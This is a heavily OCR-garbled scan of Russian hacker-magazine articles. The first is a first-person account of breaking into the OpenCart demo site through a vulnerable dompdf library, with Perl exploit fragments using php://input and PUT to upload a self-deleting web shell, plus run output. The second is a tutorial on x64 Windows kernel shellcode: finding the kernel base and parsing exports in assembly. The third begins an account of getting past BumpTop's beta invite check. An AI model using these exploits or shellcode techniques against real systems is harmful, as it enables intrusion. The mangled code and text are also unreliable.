1 I 1$Ік | 8 ; 15УІ ' ) ; 
йеііпе ( 1 БВ_БАТАВА8Е ' , 

' орепсагБ_с1ешо ' ) ; 
сіеііпе ( ' БВ_РКЕЕІХ ' , ' ' ) ; 

?> 

Теперь есть логин и пароль пользователя Му5(Х. 
Надо проверить сервер на наличие открытого 
порта 3306. С забугорного дедика запускаю: 

пшар 85.13.246.138 -р 3306 

птар сообщает о том, что порт открыт. С того 
же дедика пробуем: 



шузді -Ь 85.13.246.138 -и 
орепсагБ_изег -р 

У нас запрашивают пароль. Вводим его, но 
нас шлют лесом. Многочисленные попытки 
с разных серверов, через разные прокси и 
разные методы не дают никаких результатов: 
то неверный пароль, то непонятная каша 
вместо приглашения, то срывы соединения. 
Обидно и непонятно. Облом номер один. 

Затем мне пришла в голову одна идея. Если 
инклуд удаленных файлов и протокол баіа 
запрещены, то что будет, если попробовать 
найти в демоверсии сайта загрузку файлов? 
Нам бы пригодилась и загрузка картинок. 
Заинклудив картинку с РНР-кодом, мы могли 
бы его выполнить. К сожалению, поиск по 
демонстрационной версии админки не принес 
никаких результатов. Админка была урезана в 
правах и нельзя было грузить даже картинки. 
Облом номер два. Потом я решил взяться за 
врапперы РНР, поколдовать с ними — вдруг 
что выгорит. Но все безрезультатно. Ситуация 
такова: удаленные файлы читать нельзя, ло- 
кальные файлы можно получить в виде РОЕ и 
можно выполнять РНР-код локальных файлов. 
Но проку от этого всего нет, если нет возмож- 
ности выполнить именно свой код. Тогда я 
вспомнил про инклуд РНР-кода в локальные 
файлы. Но как я не пытался, ни старый трюк с 
лог-файлами арасбе, ни метод с /ргос тоже не 
помогли. Это был облом номер три. 

... НО В ИТОГ! МОЯ ВЗЯЛА 

Все это начинало действовать на нервы 
— есть и уязвимость, и конфиг с паролем к 



базе данных, но всюду меня шлют лесом. 
Оставив это дело на следующий день, я от- 
правился спать. Как говорится, утро вечера 
мудренее. 

На следующий день я снова принялся курить 
мануалы по РНР и разгребать уязвимую 
библиотеку. Вспоминая про обертки, фильтры 
и прочее, я вспомнил про рбр://іприС Эта 
обертка позволяет читать Р05Т данные, и 
независима от каких-либо директив РНР. В 
общем, затея моя была такова: вместо файла 
подставить данную обертку, а нужный код 
послать в РОЗТ-массиве. В итоге строка за- 
проса в эксплойте должна быть такой: 

ТШБр : / / . . . /сіотрсіі . р!ір?іприЦ_ 

іі1е=р]гр : //іприБ 

Быстро набросав на коленке Регі-скрипт, я 
принялся тестировать этот метод. Но был жутко 
огорчен. Данные, принимаемые из Р05Т- 
массива, приходили как закодированные ІЭ РБ- 
эквиваленты; к тому же полностью приходило 
как содержимое, так и название переменной. 
То есть, получалось такое безобразие: 

ѵаг=%ЗС%ЗЕр]тр%2 0есЬо%2 899 9%2 9%ЗВ 

Понятно, что это не будет выполняться как 
код. Снова надо было думать и искать аль- 
тернативные варианты, а ведь счастье было 
так близко. В поисках методов модификации 
передаваемых значений через рбрУ/іприі: я 
набрел на метод РІІТ. Надо бы попробовать 
его — он проще, чем Р05Т, но поддержива- 
ется не всеми серверами и не всегда. Итак, 



Документация РНР по методу РУТ 
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Наш шелл во всей красе :) 

заменив Р05Т на РІІТ, пробуем послать 
какую-нибудь строку, которая должна выпол- 
ниться как РНР-код. И что ты думаешь? Это 
прокатило, скрипт получает чистую строку, 
код выполняется. Второй эксплойт основан 
на методе с РІІТ и рЬр:/іприІ, он загружает 
произвольные файлы на сервер с уязвимой 
библиотекой, действуя в несколько этапов. 
Вот кусок из эксплойта: 

ту $Стр_з1іе11 = << ' В б 4 ' ; 

<?рЪр 

іі: ( @тоѵе_ир1оа<іе(і_^і1е ($_РШ!8 ( ' бі ' ] 
Стр_пате 1 ] , $_РІЬЕ8 [ ' Г і ' ] [ 1 пате ' ] ) ) 

{ 

есЪо ( 9 ) ; 

@ип1іпк( РІЪЕ ) ; 

} 

В64 

ту $зЬе1164 = епсос!е_Ъазе64 ( 
$Цтр_з1іе11) ; 
ту $кор1ір = зргіпкі: ( 

"<?рЬр еѵаі (Ъазе64с1есос1е ( ' %з ' ) ) ; " , 
епсойе_Ьазеб4 ( 

" ^і1е_риС_сопСепСз ( ' і .рЬр ' , 
Ъазе64_сіесо(іе ( ' $зЬе11б4 '));") 

) ; 

# Зкаде 1, ехріоікіпд БОМРБР 
ѵиІпегаЬіІіСу . 

ту $гед = РИТ " $иг1/йотрсіЕ . 
рЬр?іприС_Еі1е=р]тр : //іприк " , Сопкепк 
=> $кор1ір; 

В переменной ${тр_5НеІІу нас временный 
мини-шелл. Его задача — загрузить файл 
(для нас предпочтительно полноценный 
шелл] и удалить самого себя. Этот мини-шелл 
будет записан в файл і.рбр при выполнении 



РНР-кода. В последней строке у нас нахо- 
дится перловый запрос РІІТ. В принципе, тут 
все должно быть интуитивно понятно. Этот и 
самый первый эксплойты ищи на диске. 

Таким образом, вырос второй эксплойт, 
ориентированный на вариант, когда а11о\л/_ 
игИюреп=о1Т На локальном сервере все 
замечательно работает, шелл заливается. 
Теперь остается скрестить пальцы и запустить 
наш эксплойт против демоверсии сайта. Сно- 
ва соединяюсь со своим дедиком и запускаю 
оттуда эксплойт: 

ѵ\плплг-с1аЦа@зс1: /ѵаг/ѵ\плплг/1іЬ$ . /е.рі 
-и=ТШСр : / /сіето . орепсагР . сот/ -з= . / 
Іодз . ріір 

шт . орепсагР . сот ехріоір 

[~] ЕхрІоіРіпд ЬРРр :/ /сіето . 
орепсагР . сот/ 

[ + ] Ок, иріоасііпд зііеіі... 

[+] Ок, гезропзе[9], сііескіпд Рог 
зЬеДД. 

[ + ] Ок, зііеіі: ЬРРр :/ /сіето . 
орепсагР . сот/зузРет/ЬеІрег/сіотрсіР/ 
печлгі . ріір 

Какты понимаешь, теперь мне повезло, и 
шелл залился. Находясь внутри сервера, 
я увидел, что админы сервера поотрубали 
множество опасных функций РНР, неплохо 
настроили РНР-конфиг, но это их не спас- 
ло. Изначально поставленная мною цель 
была достигнута — преодолеть первый 
рубеж, залить шелл. Находясь на сервере, 



можно было дампить базу данных, рутать 
сервер, дефейсить и так далее, но это не 
входило в мои планы. Я поступил более 
гуманно, сообщив администраторам об 
уязвимости. Админы подсуетились в тот же 
день, так что на оффсайте последняя вер- 
сия (1.4.6) не поддается эксплойту. Поэтому 
можно наткнуться как на уязвимый, так и 
на чистый движок одной и той же версии. 

хэппи энд 

Какой урок можно извлечь из этой исто- 
рии? Атакующей стороне — не сдаваться и 
не отступать, а шевелить мозгами и искать 
пути обхода. Какты мог наблюдать, для того, 
чтобы попасть на сервер, мне пришлось 
перебрать немалое количество разных 
техник и методов эксплуатации уязвимо- 
стей. Что по поводу разработчиков, то есть 
такая пословица: «доверяй, но проверяй». В 
движке, с которым мы работали, была при- 
менена уязвимая сторонняя библиотека, что 
и стало причиной успешной атаки. А ведь об 
уязвимости было известно еще до моего экс- 
плойта. Это говорит о том, что разработчики 
движка не интересуются безопасностью, не 
читают багтреки, да и аудит своей системы 
в целом не проводят. В итоге финал таков, 
как он есть. Но одно было сделано правиль- 
но. Сами исходники движка находятся на 
хостинге от боодіе. Возможно, если хорошо 
поискать, то можно и на оффсайте найти ау- 
тентификационные данные для хостинга про- 
екта, но это уже потребует немного больших 
усилий. Помимо безопасности, это снижает 
нагрузку на сервер, остается больше места, 
не расходуется трафик. 

В общем, учись, не вреди и используй знания 
в благих намерениях, т 
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Для тебя наверняка не секрет, что ядро 64-битной ѴѴіпсІоѵѵз подверглось 
значительным изменениям. Это, в первую очередь, касается ряда системных 
структур и функций. А значит, на 64-битной винде привычные способы написания 
шелл-кодов становятся совершенно бесполезными, посему приходится брать 
дизассемблер и адаптироваться к новым условиям. Копаться в этих самых 
структурах, сравнивать и анализировать. Нем мы сегодня с тобой и займемся! 



Ч то примечательно — никто до меня эту тему не расписывал. 

Да и я сам за все время существования х64 видел только при- 
мер шелл-кода гіпдЗ ( іп]ЗсШг.сот/ехр[оі1:5/9740 ). Под нулевое 
кольцо мне пока ничего увидеть не довелось. Будем это дело 
исправлять — ведь, в конце концов, область применения 
позиционно-независимого кода чрезвычайно широка: от вполне 
легальных пакеров/протекторов до руткитов и эксплойтов. 

НТО НУЖНО ДЛЯ РАБОТЫ? 

Для компиляции драйвера (мы ведь пишем шелл-код гіпдО] тебе 
потребуется Масго АззетЫег х64 (т 164] . Его можно утянуть из ѴѴБК. 
Сам Ѵ\ЮК доступен для скачивания на сайте Мелкософта по ссылке: 
ітлсгозоІЧ.сот/ѵѵбсІс/РеѵТооІз/ѴѴРК/ѴѴРКркд.ппзрх . 

После компиляции драйвер можно будет загрузить с помощью 
набора консольных утилит из примеров для ЕА5М ( і пзіа 11_сІ гѵ. 
ехе, 5ТагТ_сІгѵ.ехе и п р. ] . И только потому, что мне было лень 
написать свою утилиту (сваяю в ближайшее время). Скачать их 
можно по ссылке: ЛаІа55еглЬІеГѵОеі/ехагпрІе5/ѵѵіп64_сІгіѵег5.2Ір. 
Помимо всего прочего тебе понадобятся МісгозоЙ РеЬиддіпд 
Тооіз (64-битные версии) + ІіѵексІ Руссиновича (нужен для про- 
смотра смещений в ядерных структурах). Первое и второе можно 
скачать на сайте МісгозоЙ: т ісгозоИ соігѴѵѵМс/беѵіюоІз/беЬиддіпд/ 
іп5Іа[[64ЬЩт5рх и ІесЬпеСтісгозо^.сот/ги-ги/зѵзіпІегпаІз/ 

6689741 б.азрх . Чтобы лицезреть отладочный вывод своего 
новоиспеченного драйвера, тебе потребуется РбдѴіеѵѵ. Он себя 
(что очень приятно) прекрасно чувствует на 64-битной винде, 



как, впрочем, и ІіѵексІ ( іесбпеЕтісгозоІЧ.сопп/еп-из/зѵзіпІегпаІз/ 
66896647.азрх ). 

Дизассемблировать ядерные модули будем с помощью ЮА х64. 

Ну и для успешного восприятия того, что здесь написано, ты должен 
быть знаком с форматом РЕ и хотя бы в общих чертах понимать, что 
представляет собой 64-битный ассемблер. К вышесказанному надо 
еще добавить желание разобраться в тонкостях 64-битного пи- 
кодинга :). 

ПЛАН ДЕЙСТВИЙ 

Обрисую задачи, которые нам необходимо будет решить при написа- 
нии базонезависимого кода. Чтобы в голове все уложилось, всегда 
лучше следовать определенному плану. 

1. Получение адреса начала ядра (ака пТозкгпІ); 

2 . Разбор таблицы экспорта пТозкгпІ; 

3. Получение адресов нужных функций; 

4 . РгоМ 

Итак, начнем по порядку... 

ПОИСК БАЗЫ ЯДРА 

Первым делом нам необходимо получить базу ядра. Я рассмотрю три 
способа получения: 

• через поля структуры Ргосеззог СопТгоІ Редіоп (сокращенно РСР); 

• юзая инструкцию ЗІСЙ; 

• через ппзг (они же машинно-зависимые регистры). 

Конечно же, способы получения адреса начала ядра не исчерпываются 
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Вывод нашего драйвера в ОЬдѴіеѵѵ 
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і-Іріхі 1 

Единственный хб4 шелл-код, обнаруженный мной и мирно 
лежащий на іпізсіог.сот 
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Родной интерфейс т1б4 



только этими тремя. Более того, здесь все ограничивается 
только фантазией кодера; в мои цели входит лишь расста- 
вить путеводные флажки для твоих дальнейших исследова- 
ний. Что ж, приступим! 



СПОСОБ №1 

Суть как этого, так и других способов в том, что мы должны 
отыскать какой-то адрес, принадлежащий піозкгпі. Такой 
адрес можно получить из, скажем, обработчика прерыва- 
ния іпі 3 из ісК. Выбор допустимого вектора определяется 
тем, принадлежит ли он обычно ядру. Я говорю «обычно», 
так как могут стоять различные хуки. Хотя на х64 ісИ: про- 
веряется РаІсН (ЗиагсІ, его защиту можно без труда обойти. 
В вопросе поиска подходящего обработчика нам поможет 
Ііѵекб и его команда ПсК, которая дампит таблицу пре- 
рываний. 



0: кс!> !іс4і 
Бишріпд ІБТ: 



111118000102с400 
111118000102с4с0 
111118000102с600 
Зіаск 

111118000102с940 
111118000102са00 
111118 00 0102сас0 
111118000102сЪ80 
111118000102с(440 
111118000102се00 
Зіаск 

09: 111118000102сес0 
0а: 111118000102с180 
0Ь: 111118000102(4040 
0с: 111118000102(4140 
0(4: 111118000102(4240 
0е: 111118000102(4340 
10: 111118000102(4680 
11: 111118000102 (47 с0 
12: 111118000102(4880 



п1 ! КіБіѵісіеЕггогРаиІІ 
п1 ! КіБеЪидТгарОгРаиІІ 
п1 ! КіЫтіІпІеггирІ 
= 0хРРРРР8000011Б000 
п1 ! КіВгеакроіпІТгар 
п1 ! КіОѵегІІоѵѵТгар 
п1 ! КіВоипс4Раи11 
п1 ! КіІпѵа1і(40рсо(4еРаи11 
п1 ! КіЕрхЫоІАѵаіІаЪІеРаиІІ 
п1 ! КіБоиЫеРаиІІАЬогІ 
= 0хРРРРР8000011В000 
п1 ! КіЫрхЗедтепІОѵеггипАЪогІ 
п1 ! КіІпѵа1і(4ТззРаи11 
п1 ! КіЗедтепІЫоІРгезепІРаиІІ 
п1 ! КіЗІаскРаиІІ 
п1 ! КіОепегаІРгоІесІіопРаиІІ 
п1 ! КіРадеРаиІІ 
п1 ! КіРІоаІіпдЕггогРаиІІ 
п1 ! КіАІідптепІРаиІІ 
п1 ! КіМскескАЪогІ 



13 

11 

2с 

2(4 

21 



Зіаск = 0хРРРРР8000011Р000 
111118000102(4Ьс0 п1 ! КіХігапЕхсерІіоп 
11111800010279е0 п! ! КіАрсІШеггирІ 
111118000102(4(440 п1 ! КіКаізеАззегІіоп 
111118000102 (4е00 п1 ! КіБеЬидЗегѵісеТгар 
1111180001067с70 п1 ! КіРрсІпІеггирІ 






> СІѴСІ 



Итого 20+ возможных вариантов, что не так уж мало. 

Но, чтобы определить адрес обработчика, нам потребуется 
адрес начала ібС Один из способов ее получения — чте- 
ние поля КРСР.ІсІіВазе. О виде структуры РСР спросим, 
как обычно, у ІіѵексІ. 



Исходники 
скомпилированного 
драйвера ищи на 
нашем РУР. 



0: к(4> 


(41 _КРСК 






п1 ! _КРСВ 






+0x000 


ЫІТІЬ 




_ЫТ_ТІВ 


+0x000 


ОсІІВазе 




Р1г64 _КСВТЕЫТКУ64 


+0x008 


ТззВазе 




Р1г64 _КТ3364 


+0x010 


РегІСІоЬаІСгоирМазк : Р1г64 Ѵоі(4 


+0x018 


Зеі! 




Р1г64 _КРСК 


+0x020 


СиггепІРгсЬ 




Р1г64 _КРКСВ 


+0x028 


ЬоскАггау 




Р1г64 _К5РІЫ_ЬОСК_01}ЕЦЕ 


+0x030 


Юзе(4_3е11 




Р1г64 Ѵоі(4 


+0x038 


ШіВазе 




Р1г64 _КІ РТЕІТГКУ 6 4 


+0x040 


Штизесі 




[2] ИІПІ8В 


+0x050 


Ігді 




ИСДаг 


+0x051 


Зесогх4Ъеѵе1Сас1іеАззосіа1іѵі1у : ЮСІіаг 


+0x052 


ОЬзоІеІеЫшпЬег 




ИСДаг 


+0x053 


РІ110 




ТГСЬаг 


+0x054 


ЮпизесЮ 




[3] ИІПІ4В 


+0x060 


Ма:іогѴегзіоп 




ЮІПІ2В 


+0x062 


МіпогѴегзіоп 




ЮІПІ2В 


+0x064 


ЗІаІІЗсаІеРасІог 




ИІПІ4В 


+0x068 


Шіизесіі 




[3] Р1г64 Ѵоіс4 


+0x080 


Кегпе 1 Ре зегѵесі 




[15] ЮІПІ4В 


+0х0Ъс 


ЗесопсЩеѵеІСасЬеЗіге : Юіпі4В 


+0х0с0 


НаІКезегѵей 




[16] ІІІПІ4В 


+0x100 


Шшзе(42 




ІІІПІ4В 


+0x108 


К(4ѴегзіопВІоск 




Р1г64 Ѵоі(4 


+0x110 


ШшзесІЗ 




Р1г64 Ѵоі(4 


+0x118 


РсгАІідпІ 




[24] ЮІПІ4В 


+0x180 


РгсЬ 




_КРКСВ 



Как ты можешь заметить, указатели расширились до 
64 бит, ну и имена полей (сравнивая с 32-разрядной Вин- 
дой) тоже поменялись. Но это не самое главное, так как 
для нас в данный момент важно смещение поля ІсІіВазе 
относительно начала _РСР. 
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^^Хорошо, допустим, структуру х64 РСР мы мало-мальски знаем (честь и 
хвала ІіѵексІ). А откуда мы достанем указатель на КРСР? Глянем в код 
л?» функции из ЬаІ.сНІ НаПпіІіаІізеРгосеззог. 

О 

,ѵ 






( 



. ЕехЕ : 00000000800ІЕ240 риЫіс НаІІпіЕіаІігеРгосеззог 
. ЕехЕ : 00000000800ІЕ240 НаІІпіЕіаІігеРгосеззог ргос пеаг 
; БАТА ХВЕЕ: .рбаЕа : 000000008004С804 о 

. ЕехЕ :00000000800ІР240 
. ЕехЕ : 0 00 0 00 0 08 О 0ІР2 40 ѵаг_28 
. ЕехЕ : 0 00 0 00 0 08 0 0ІР2 40 ѵаг_20 
. ЕехЕ : 0 00 0 00 0 08 0 0ІР2 40 ѵаг_18 
. ЕехЕ : 00000000800ІР240 агд_0 = 



= ЪуЕе рЕг -2 8Ь. 

= ЪуЕе рЕг -2 (Ж 
= дтлгогсі рЕг -18Ъ 
ЪуЕе рЕг 8 



. ЕехЕ :00000000800ІР240 
. ЕехЕ : 00000000800 ІР240 
. ЕехЕ : 00000000800ІР242 
. ЕехЕ : 00000000800ІР246 
.ЕехЕ: 000000008001Р24Р 
. ЕехЕ :00000000800ІР252 
. ЕехЕ :00000000800ІР258 
.ЕехЕ: 000000008001Р25С 
.ЕехЕ: 000000008001Р25Е 
. ЕехЕ : 00000000800ІР262 
. ЕехЕ :00000000800ІР265 
.ЕехЕ: 000000008001Р26С 
. ЕехЕ :00000000800ІР273 
. ЕехЕ : 00000000800ІР27А 
. ЕехЕ : 00000000800 ІР2 82 



ризЪ 

зиЬ 



шоѵ 



шоѵ 

зЫ 

Іеа 



ог 



стр 

тоѵ 



гЬх 

гзр, 40Ъ 
г8, дз:18Ь 
гЮб, есх 
г9б, 1 

гах, [г8+20Ъ] 
есх, есх 
[гах+4 ] , гЮЬ 
г9 , сі 

гах, НаІрРгосеззогРСК 
сз : НаІрАсЕіѵеРгосеззогз , г9 
сз : НаІрЗЕаЕісІпЕАЕЕіпіЕу , 0 
бѵтогб рЕг [г8+64Ъ] , 64Ъ 
[гах+г!0*8] , г8 
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піе Есііі Ѵіеѵу ОеЬид Ѵѵіпао\# Неір 



ИСоттапй - Ритр С:\\ѴШР0^3.1\5у5*ет32\Ііѵексі.<]тр - \ѴіпРЬд:6.1 І.ОИНѲЕЗ 



Уоиг сіеЬиддег із по! изіпд іЬѳ соггес! зутЬоІз 



\ 
> > 



д 

ШШММШШШЖЮХ 



А] 



Сегіаіп рйЬ і ііез (зисЬ аз !Ье риЫіс 05 зупЬоіз) сіо по! 
сопіаіп !Ье гечиігесІ іпіогтаЬіоп Соп!ас! !Ье дгоир !Ьа! 
ргоѵісіесі уои ѵі!Ь !Ьезе зутЬоІз іі уои пеесі !Ыз соппапд !о 
ѵогк . 



Туре геіегепсесі: кегпе!32 ! рНІзІІзегІпіо 



РгоЬаЫу саизесЗ Ьу : ІіѵеК<і0.5У5 ( ЬіѵѳКсіО+19ЬО ) 
Гоі Іоѵир : МасЬіпеОѵпѳг 



| Іл 0. СоІ 0 Зуз ОСАѴѴ1МО Ргос000:0 ТЫ000:0 |А8М | ОѴВ |САР5 Щш 



Если консоль ІіѵексІ тебе не по душе — запускай 
ІіѵексІ с параметром -ѵѵ 



и 

о 



I 

ІЛ 



; получение адреса обработчика іпЕ 3 

; Размер дескриптора шлюза теперь 16 байт. Нужен тре- 
тий обработчик от 0 
; ШТ_Х — константа = 3 
абб гсх ,16* ШТ_Х 

; собираем вместе поля ОЕЕзеЕЬом, ОЕЕзеЕМіббІе и 

ОЕЕзеЕНідЪ. структуры КІБТЕЫТВУ64 

шоѵ г11,ф\гогб рЕг [гсх] 

апб г11 , ОРРРРЪ. 

шоѵ гсх, дѵгогб рЕг [гсх+4] 



0 

4 

I 



Как видим, указатель на РСК для текущего процессора мы можем 
утянуть из дз:[18Ы. В 32-битной Винде юзали сегментный регистр бз, а 
теперь дз :). 

Так, а что стало с дескрипторами шлюзов в ісЙ? Нам ведь надо до- 
стать адрес обработчика іпі 3 (ну или другого, по вкусу], а у нас только 
дескрипторы шлюзов, по которым «размазано» смещение обработчи- 
ка. Они, конечно же, в х64 тоже поменялись. Как именно? Изменения 
можно (и нужно] смотреть в оригинальных мануалах производителя 
(АІѴЮ, I піеі), но у нас сейчас под рукой только ІіѵексІ. И с его помощью 
тоже можно узнать нужную инфу! Вводим сИ: _КЮТЕІ\ІТРѴ64, чтобы вы- 
тянуть из отладочных символов структуру дескриптора шлюза. 



; теперь в гсх адрес обработчика іпЕ 3 (ОЕЕзеЕ) 

ШОѴ СХ,ГІІѴ\Г 

апб сх,0Р000Ъ. ; обнуляем младшие 12 бит адреса 

зеагсЪ_1оо: ; цикл поиска базы пЕозкгпІ 

стр ѵ\гогб рЕг [гсх] , ' 2М' 

ЗП 2 пхЕ 

зиЪ гах , гах 

; еах -> РР оіізеЕ 

тоѵ еах,б\лгогб рЕг [гсх+ЗСЬ.] 

; проверка сигнатуры РР 
стр ѵ\гогб рЕг [гсх+гах] , ' РР ' 

32 Еоипбеб 



0: кб> бЕ _КІБТЕБТКУ64 
пЕ ! _К I БТЕЫТКУ 6 4 

+0x000 ОббзеЕІхж 


: БІПЕ2В 


+0x002 


ЗеІесЕог 


: БІПЕ2В 


+0x004 


ІзЕІпбех 


: Роз 0, 3 ВіЕз 


+0x004 


КезегѵебО 


: Роз 3, 5 ВіЕз 


+0x004 


Туре 


: Роз 8, 5 ВіЕз 


+0x004 


і — 1 

а 

р 


: Роз 13, 2 ВіЕз 


+0x004 


РгезепЕ 


: Роз 15, 1 ВіЕ 


+0x006 


ОЕЕзеЕМіббІе 


: БіпЕ2В 


+0x008 


ОЕЕзеЕНідЪ 


: БІПЕ4В 


о 

о 

о 

X 

о 

+ 


Кезегѵебі 


: БІПЕ4В 


+0x000 


АІідпшепЕ 


: БІПЕ8В 



0: кб> 



пхЕ : 

; продолжаем поиски. . . 

зиЬ гсхДОООк ; так быстрее всего 

зтр зеагсЪ_1оо 

Еоипбеб: 



СПОСОБ №2 

Этот метод также основывается на ісЙ. Он несколько лаконичней, 
чем предыдущий, но также имеет ряд особенностей по сравнению с 
аналогичным способом для 32-разрядной версии ѴѴіпбоѵѵз. Основная 
причина различий — изменение формата регистра ібіг. Поле лимита 
не поменялось (как было 2 байта, так и осталось], а вот поле базы 
стало равным 8 байтам. 

Структура ісііт на х64 следующая: 



Из этого дампа мы должны понять, где внутри дескриптора распола- 
гаются кусочки адреса обработчика (он же Оббзеі] . Адрес, как ты уже 
понял, тоже 64-битный. 

Вот, собственно, и все, что нам нужно. Ниже привожу код с коммента- 
риями, который и получает базу ядра этим способом. 



ЕуребеЕ зЕгисЕ _ІБТК 

{ 

63НОКТ изЬітіЕ; 
РЬОШРСШС иВазе; 
}ІБТВ; 



; _КРКС 

тоѵ гсх, дз : [18Ъ.] 

; +0x038 ІбЕВазе : РЕг64 _КІБТЕЫТКУ64 

тоѵ гсх,дѵтогб рЕг [гсх+3 8Ь] 



Получив базу ісЙ, действуем инструкцией зісИ так же, как и в предыду- 
щем примере. Обнуляем младшие 12 бит адреса и, вычитая по ЮООЬ, 
проверяем сигнатуры М2 и РЕ. 



► 062 
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СПОСОБ № 3 

Еще один красивый способ заключается в получении адреса 
Кі5у5іетСа1164 (так называется обработчик в 64-битном ядре) из тзг 
регистра ІзЕа г (его адрес 0x00000082). Этот регистр (как, вероятно, тебе 
известно) используется командой зузсаіі. 

зиЬ гсх, гсх 

шоѵ есх, 0С0000082Ъ. ; адрес тзг в есх 

гбтзг ; читаем машинно-зависимый регистр ІзСаг 

После этого в паре регистров ебх:еах будет содержаться адрес 
Кі5узІетСа1164. Кстати, вовсе необязательно читать именно регистр 
Ізіаг. Вообще, инструкция зузсаіі в Іопд тобе (режим процессора, в 
котором работает 64-разрядная винда) юзает 2 тзг регистра: сзіаг и 
Ізіагі для сотраІіЬіІіІу и 64-ЬіІ тобе соответственно. Так к чему это 
я веду? В тзг сзіаг (0x00000083) тоже лежит адрес, принадлежащий 
диапазону адресов піозкгпі! — это адрес процедуры Кі5узІетСа1132. 
Далее по уже известной тебе схеме получаем адрес начала ядра. 

РАЗБОР ЭКСПОРТА В ѴШ00ѴѴ8 Х64 

Теперь приступаем к получению адресов нужных функций. Так как мы 
имеем дело с форматом РЕ32+, надо учитывать его специфику. 
Обрисую основные моменты, которые поменялись. Если ты имеешь 
опыт написания шелл-кодов для ѵѵіп32, то наверняка знаешь, что по- 
лучить указатель на директорию экспорта можно, прибавив к адресу 
начала ІМА6Е_І\ІТ_НЕА0ЕВ5 786. В ѵѵіп64 мы прибавляем 886. Уве- 
личение значения величины смещения обусловлено увеличением 
некоторых полей в РЕ32+ по сравнению с РЕ32. 

Взглянем на структуру _1МА0Е_1\1Т_НЕА0ЕР564: 

Суребеі зСгисІ _ІМАСЕ_БТ_НЕАБЕК364 { 

ШОКБ Зідпабиге; 

ІМАСЕ_ЕІБЕ_НЕАБЕК ЕІІеНеабег; 

I МАСЕ_0 РТ I (ЖАЬ_НЕ АБЕК 6 4 ОрбіопаІНеабег ; 

} ІМАСЕ_БТ_НЕАБЕК8 б 4 , * РІМАСЕ_БТ_НЕАБЕКЗ б 4 ; 

То есть изменения коснулись полей опционального заголовка, 
из-за этого пришлось поменять смещения. Кстати ІМАСЕ_ЕХРОРТ_ 
ОІРЕСТОРУ (как и ІМА0Е_В05_НЕА0ЕР) не поменялась, что играет 
нам на руку. 

В заключение привожу код разбора таблицы экспорта для РЕ32+: 

зЬе11собе_6аба : 
сЗ.Ь " ЕмСгеаРеЕіІе " , О 

; ищем адрес нужной функции 
; ехрогБ бігесбогу 
Іеа гіі , [гсх+гах+88Ь] 
зиЬ г12,г12 

; ехрогР бігесбогу гѵа 
шоѵ г12б, бтлгогб рбг [гіі] 

; Виртуальный адрес ІМАСЕ_ЕХРОКТ_БІКЕСТОКУ 
абб г12 , гсх 
зиЬ г8,г8 

;пишЬег о1 ТипсБіопз 

шоѵ г8б,бѵгогб ррг [г12 + 18Ь] 

зиЪ г9,г9 

; АббгеззОШатез 

тоѵ г9б,бчлгогб рРг [г12+20Ь] 

; Іипсбіоп патез ѵігбиаі асісігезз 
асісі г9 , гсх 
«Тес г8 
; ^ипс_пате 



тоѵ гсЗі , зЬе11сосіе_(іаРа 
пехБ_^ипсБіоп : 
зиЬ гзі,гзі 

тоѵ езі,сіѵ\гогс1 рБг [г9+г8*4] 
асісб гзі,гсх 

; сбросим флаг направления, чтобы при команде 
стрзЬ происходил инкремент регистров 
с 16. 

ризЬ. гбі 

; сохраняем гсх — команда стрзЬ его модифицирует 
ризЬ гсх 

; устанавливаем счетчик символов для команды стрзЬ 
тоѵ гсх, 12 

; начинаем сравнивать строки посимвольно 
гере стрзЬ 
б 2 1оип6е6_1 

рор гсх ; восстанавливаем значения модифицируемых 
стрзЬ регистров 
рор гіі 

; уменьшаем счетчик функций 
бес г8 

б П 2 пехб_1ипсбіоп 
бтр поб_1оип6 
1оипбе6_1 : 
рор гсх 
рор гіі 
зиЬ гЬх,гЬх 

; АббгеззОІКатеОгЫпаІз КѴА 
тоѵ еЬх,сТлгогс1 рбг [г12+24Ь] 

;Бате0гбіпа1з ѴА 
абб гЬх , гсх 

; іпбех Ій аббгезз БаЫе іпбо г 8 
тоѵ г8ѵ^, ѵ^огб рбг [гЬх+г8*2] ; кладем значение 

индекса в младшее слово регистра г8 
апб г8б, ОЕЕЕЕЬ 
зиЬ гЬх , гЬх 

тоѵ еЬх,бѵ70гб рбг [г12 + 1СЬ] 
абб гЬх , гсх 
зиЬ г12,г12 

тоѵ г12б, [гЬх+г8*4] ; кладем в младшее двойное 

слово регистра г12 КѴА нужной нам функции 
; в регистре гсх получаем адрес функции ЕмСгеабеЕіІе 
абб гсх,г12 
поб_1оипб: 

Как видишь, этот код имеет два существенных недостатка. Во-первых, 
я не хеширую имя функции, а использую посимвольное сравнение. 
Во-вторых, отсутствует оптимизация. 

Теперь компилируем драйвер с помощью т164, а отладочный вывод 
смотрим в ОЬдѴіеѵѵ. 

Правильность полученного адреса можно проверить в Ііѵекб. Для этого 
введем команду: 

и полученный_адрес 

ЗАКЛЮЧЕНИЕ 

Вот мы и разобрались с ядерным шелл-кодингом под 64-бит- 
ную Винду. На первый взгляд ничего сложного. Вообще, надо 
сказать, что 64-разрядные процессоры очень привлекательны 
для написания пи-кода. Все дело в таких нововведениях, как 
гір-геіаііѵе аббгеззіпд и большее количество регистров. Правда, 
некоторые вещи я намеренно упустил из виду — не приводить 
же совсем законченное решение :). С этим тебе, читатель, еще 
предстоит разобраться, и да поможет тебе дизассемблер! т 
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взлом 



■ ■ Максим Бурини Макзіт.ВигпіпгадтаіІ. сот; Дмитрий «2РЕБ» Смирнов 



Трехмерный 

взлом 



В1ШРТ0Р ИЛИ БЕТА-ВЕРСИЯ БУДУЩЕГО 



Наверное, каждый человек хочет, чтобы все нужное всегда было с ним и лежало 
в одном месте. ВитрТор придерживается именно такого принципа - это своего рода 
«коробка», в которой можно все разложить по полочкам или парой кликов мышью 
обратить в хаос. Ты, наверное, уже догадался, что речь идет о рабочем столе ЗР. 



ПРИГЛАШАЕМСЯ НА ТЕСТИРОВАНИЕ 

Год назад я впервые увидел видео-демонстрацию трехмерного деск- 
топа ВитрТорО, тогда же я подал заявку на бетатестирование. Время 
шло, а инвайт на почту все не приходил, я уже и забыл про него. И вот, 
на днях в одном из блогов я наткнулся на заметку о ВитрТор и вспом- 
нил, что когда-то отправлял заявку на инвайт, и что мне так ничего и 
не дали. 

ШАГ ПЕРВЫЙ 

Для начала я решил поискать, что доступно в Сети. С этой целью я 
зашел на любимый ГберігаГеЬаѵ.огд . вбил в строке поиска «ВитрТор» 
и получил всего 1 результат — бета-версию 2008 года. Скачав торрент, 
я установил и запустил ВитрТор. Как и ожидалось, я получил окно с 
просьбой предъявить инвайт. Инвайта у меня, конечно, не было, так 
